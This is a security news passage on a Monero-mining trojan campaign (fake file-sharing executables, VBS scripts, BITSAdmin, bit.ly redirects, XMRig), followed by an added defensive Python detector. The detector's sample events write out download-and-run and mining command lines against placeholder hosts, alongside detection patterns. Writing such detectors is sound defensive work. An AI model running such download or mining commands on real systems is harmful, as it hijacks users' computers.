A single Monero cryptocurrency mining operation has used malware delivery techniques to affect at least 15 million people worldwide.

The campaign, which has been active since at least October 2017, delivers its payload using one of 250 unique Windows Portable Executable (PE) files with names like “File4org]_421064.exe” and “[Dropmefiles]_420549.exe.” The files appear to come from popular file-sharing services. They all ultimately download a piece of malware detected by Malwarebytes as “trojan.bitcoinMiner.”

This campaign’s malicious payload uses NiceHash, a marketplace for hashing power which temporarily ceased operations in December 2017 following a security breach. The trojan also uses the XMRig cryptominer to mine Monero, all at the expense of the infected computer’s CPU.

Those behind this operation have updated the malware’s behavior at least four times. Up until 20 October 2017, the payload dropped a VBS file (and an LNK file for persistence). The VBS file, in turn, used the BITSAdmin tool to download scripts and XMRig from a remote location.

Execution workflow for the oldest malware encountered in this campaign. (Source: Palo Alto Networks)

Things changed after 20 October 2017, when the initial VBS file dispensed with BITSAdmin and began using HTTP redirection services like bit.ly. Using this link shortener’s public telemetry in particular, Josh Grunzweig has come up with an estimate of how many people this campaign has likely affected:

Based on publicly available telemetry data via bitly, we are able to estimate that the number of victims affected by this operation is roughly around 15 million people worldwide. This same telemetry provides insights into the most heavily targeted areas involving this campaign, which impacts southeast Asia, northern Africa, and South America the most.

However, it’s important to note that the actual number of victims is likely much higher because less than half of the (Read more...)
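The execution chain described above (a script host calling BITSAdmin, later a URL shortener, and finally an XMRig-style miner) is something a defender can look for in process-creation telemetry. The following is an added example, not code from the article or from Palo Alto Networks: a small detector run over constructed Sysmon-style events. Field names, sample hosts, paths and wallet strings are assumptions and placeholders, not indicators from the campaign.

```python
# Added example (not from the article or Palo Alto Networks): tag process-creation
# events that match the campaign's stages. Event fields are assumed to be
# parent_image / image / command_line, roughly Sysmon Event ID 1.
import re

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}          # hosts that run a dropped VBS file
URL_SHORTENERS = {"bit.ly", "goo.gl", "tinyurl.com"}   # bit.ly is the one named in the article
# XMRig-style markers: a stratum pool URL, the donate-level flag, or "-o host:port"
MINER_ARGS = re.compile(r"stratum\+tcp://|--donate-level|-o\s+\S+:\d+", re.I)

def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def classify(event):
    """Return a list of detection tags for one process-creation event."""
    parent = basename(event["parent_image"])
    image = basename(event["image"])
    cmd = event["command_line"]
    tags = []
    # Stage 1 (before 20 Oct 2017): the VBS file uses BITSAdmin to fetch scripts/XMRig
    if parent in SCRIPT_HOSTS and image == "bitsadmin.exe" and "/transfer" in cmd.lower():
        tags.append("bitsadmin-download-from-script")
    # Stage 2 (after 20 Oct 2017): the script reaches out through a URL shortener
    if parent in SCRIPT_HOSTS and any(h in cmd.lower() for h in URL_SHORTENERS):
        tags.append("shortener-download-from-script")
    # Final payload: XMRig-style mining arguments on any process
    if MINER_ARGS.search(cmd):
        tags.append("xmrig-style-miner")
    return tags

def scan(events):
    """Map each event's index to its tags; events with no tags are dropped."""
    return {i: t for i, e in enumerate(events) if (t := classify(e))}

# Constructed sample events; hosts, paths and wallet are placeholders, not real IoCs.
SAMPLE_EVENTS = [
    {"parent_image": r"C:\Windows\System32\wscript.exe", "image": r"C:\Windows\System32\bitsadmin.exe",
     "command_line": r"bitsadmin /transfer job /download /priority high http://example.invalid/x.vbs C:\Users\u\x.vbs"},
    {"parent_image": r"C:\Windows\System32\wscript.exe", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell -c (New-Object Net.WebClient).DownloadFile('https://bit.ly/PLACEHOLDER','x.exe')"},
    {"parent_image": r"C:\Users\u\x.exe", "image": r"C:\Users\u\svchost.exe",
     "command_line": "svchost.exe -o stratum+tcp://pool.example.invalid:3333 -u WALLET_PLACEHOLDER --donate-level=1"},
    {"parent_image": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\notepad.exe",
     "command_line": "notepad.exe notes.txt"},
]

if __name__ == "__main__":
    for index, tags in scan(SAMPLE_EVENTS).items():
        print(index, tags)
```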